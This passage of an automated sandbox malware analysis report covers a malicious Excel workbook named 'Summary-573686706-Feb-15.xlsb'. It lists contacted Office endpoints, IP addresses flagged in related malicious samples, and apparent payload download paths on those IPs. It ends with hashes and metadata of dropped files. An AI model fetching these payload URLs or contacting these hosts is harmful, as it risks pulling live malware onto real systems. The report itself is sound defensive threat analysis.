                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                      high
                      https://powerlift.acompli.netBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                        high
                        https://cortana.aiBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                  high
                                  https://api.aadrm.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                    high
                                    https://api.microsoftstream.com/api/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                        high
                                        https://cr.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                          high
                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://portal.office.com/account/?ref=ClientMeControlBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                            high
                                            https://graph.ppe.windows.netBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.aadrm.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                        high
                                                        https://dev0-api.acompli.net/autodetectBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedbackBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                          high
                                                          https://api.powerbi.com/v1.0/myorg/groupsBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplateBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.netBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                          high
                                                                          https://ncus.contentsync.BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                      high
                                                                                      https://management.azure.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                        high
                                                                                        https://outlook.office365.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                    high
                                                                                                    https://api.office.netBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/initBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistoryBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/BAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macBAE70ED2-5B36-453F-8B10-DD73F840330D.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  185.141.26.236
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  60117HSAEfalse
                                                                                                                                                  185.252.215.41
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  49619AIRMOBFRfalse
                                                                                                                                                  188.165.62.32
                                                                                                                                                  unknownFrance
                                                                                                                                                  16276OVHFRfalse
                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                  Analysis ID:572744
                                                                                                                                                  Start date:15.02.2022
                                                                                                                                                  Start time:18:19:49
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 7s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Summary-573686706-Feb-15.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:22
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal80.expl.evad.winXLSB@7/5@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.68, 52.109.8.23, 52.109.12.24
                                                                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  No simulations
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  185.141.26.236Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                    185.252.215.41Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.252.215.41/1825066150275900.dat
                                                                                                                                                    188.165.62.32Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 188.165.62.32/1825066150275900.dat
                                                                                                                                                    No context
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    AIRMOBFRSummary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.252.215.41
                                                                                                                                                    HSAESummary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.141.26.236
                                                                                                                                                    ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 185.141.25.244
                                                                                                                                                    H7LG5mteEK.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.244.150.84
                                                                                                                                                    XKPppNZNEj.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.244.150.84
                                                                                                                                                    eeb0c6a760a7c9d17c02dbacf4f4715917caf3d111209.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.117.75.139
                                                                                                                                                    ub6vBoyZmA.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.82.202.246
                                                                                                                                                    Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
                                                                                                                                                    • 185.141.25.244
                                                                                                                                                    Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
                                                                                                                                                    • 185.141.25.244
                                                                                                                                                    ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 185.141.25.244
                                                                                                                                                    ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 185.141.25.244
                                                                                                                                                    Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.244.149.81
                                                                                                                                                    Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.244.149.81
                                                                                                                                                    Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.106.123.107
                                                                                                                                                    Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.106.123.107
                                                                                                                                                    hrttshkxhj.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.198.57.61
                                                                                                                                                    DG3kRWrQrf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.198.57.61
                                                                                                                                                    2doPTKCqR8.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.82.202.246
                                                                                                                                                    9BF4C9B6C5E930CE91B84920A73D9111793E6D3147745.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.117.73.137
                                                                                                                                                    wh1m0JCs2K.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.82.202.246
                                                                                                                                                    wh1m0JCs2K.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.82.202.246
                                                                                                                                                    OVHFRSummary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 188.165.62.32
                                                                                                                                                    OszQV1HEQJLo5FM.exeGet hashmaliciousBrowse
                                                                                                                                                    • 51.161.116.202
                                                                                                                                                    2lYxDlGzn9.dllGet hashmaliciousBrowse
                                                                                                                                                    • 54.38.242.185
                                                                                                                                                    bashirc.soGet hashmaliciousBrowse
                                                                                                                                                    • 51.79.175.139
                                                                                                                                                    JgLtXCuKO1.dllGet hashmaliciousBrowse
                                                                                                                                                    • 158.69.222.101
                                                                                                                                                    itUwRRwSGgIbxl9.exeGet hashmaliciousBrowse
                                                                                                                                                    • 94.23.214.113
                                                                                                                                                    arm7Get hashmaliciousBrowse
                                                                                                                                                    • 164.132.129.172
                                                                                                                                                    MBSetup.exeGet hashmaliciousBrowse
                                                                                                                                                    • 94.23.1.92
                                                                                                                                                    Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 54.36.91.62
                                                                                                                                                    20221102_3647_463773,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 94.23.87.86
                                                                                                                                                    ahsok.sh4Get hashmaliciousBrowse
                                                                                                                                                    • 46.105.173.200
                                                                                                                                                    tDb0ggawON.exeGet hashmaliciousBrowse
                                                                                                                                                    • 66.70.204.222
                                                                                                                                                    lsass.exeGet hashmaliciousBrowse
                                                                                                                                                    • 51.79.226.3
                                                                                                                                                    6F2EKlap31.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.186.33.5
                                                                                                                                                    ZXAAhPUFkw.exeGet hashmaliciousBrowse
                                                                                                                                                    • 51.91.236.255
                                                                                                                                                    02132022769992.docGet hashmaliciousBrowse
                                                                                                                                                    • 66.70.204.222
                                                                                                                                                    XdokgkT8a7.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.186.33.5
                                                                                                                                                    esaFGnQ1rW.exeGet hashmaliciousBrowse
                                                                                                                                                    • 158.69.144.161
                                                                                                                                                    0gnf7DCu6U.exeGet hashmaliciousBrowse
                                                                                                                                                    • 51.38.92.34
                                                                                                                                                    KTS Full.exeGet hashmaliciousBrowse
                                                                                                                                                    • 94.23.1.92
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):143624
                                                                                                                                                    Entropy (8bit):5.358435863323628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:mcQIfgxrBdA3guwu/Q9DQW+zUk4F77nXmvidZXtE5LWm69:GaQ9DQW+zwXCe
                                                                                                                                                    MD5:1074005731B5CDEC662C55D72F0853DF
                                                                                                                                                    SHA1:51A983CDB0C92DB59218E90B0D91E97D1F5D459B
                                                                                                                                                    SHA-256:E4F6F2454954A5B057B4F6223F65C4737FAE7AC7436E91EBFD5FB1DB95995CDF
                                                                                                                                                    SHA-512:6E02A04F3375F76FB369890B9BD842B6B37E4D6D986CDB0617240423533F31FE216DFE9AAC451DE7222C2DF420A632CE0F09AFFB8CF6F29DB895A940A4CF0D86
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-02-15T17:20:49">.. Build: 16.0.15004.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1536
                                                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 1152 x 649, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):98304
                                                                                                                                                    Entropy (8bit):7.988609336719669
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:tn/RL/g2Pb0fG1vP6orbB9BqawK9XR3DB4np23oGoC6LwWe15jug+6Oo+NOlPHa+:tnJc2P4fGVPj9BxwiXVF4p24GoW506OQ
                                                                                                                                                    MD5:0E96476D0D80AE6A2CB74C3CB740904C
                                                                                                                                                    SHA1:D026FD5701F8AEEC3385BEA0C8B7F73256D8AEC1
                                                                                                                                                    SHA-256:EE98C9DD391FFFEC7222246189FF8299E43723D08A82BB1A00A1EC8D01BB3482
                                                                                                                                                    SHA-512:BABD49D995C75EA03BCE4EA6A509AF13DAB188C0F2056A90845A0FB389CD806472BCFA80B8B4F8437C898C8E8B280DE892282B2AF1FF05DBBC25CD1070CD3097
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............L.......sRGB.........gAMA......a.....pHYs..........+......IDATx^....E...3.{.&....0g..3.....y.w.%..y'...DA..$.Qr.9.,..%m..S=;,mX...x=..8..TW.......vP.V..Z.Kl> .h60...z@....rP...z..]<../9...9...9....p.%...%...%..\..n........W.C...p.%..\..n....W'../9....p.....:1.~.1.W'..8.....K.!.:1.~.1D.N.._r.....K.!.K.!.K.!.:1.~i....F......Nl:$A...d../.f../mr..2.... .t.........4.Y...g..7W..c.1\.!.~..O#.....5...apV'...9.......g..QN.....x{...b...!.K.!.K.!.:1....1.....\....a....!zub.=.!91.....\....a....!zub...c..N.....m..n.apV'.....K.!.:1$?...:1....,..Y.C.....%..\..n.?c...g1..b..W'..c...?c..N.._r..]r.......3....p.........S.}...."...`.....W.uLk..l=...%=8KP.<......7!A.)`2.8...~.......,..Y..n.ap......g1..b.......g....1...9..b....0$'...%..\..3.Eb....gub.=....<...08....1..b...08.j1dK.....g1....p{..3.Eb....g.3p~.0.h..<.M/^D.`.....Y.v.mv..........zI.a......sa.~......~.S......08....1..~s.....,..Y...:1.....q...1...%..\........08.....ap.H.....N...08....
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):512
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3::
                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.964362195636817
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                    • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                    File name:Summary-573686706-Feb-15.xlsb
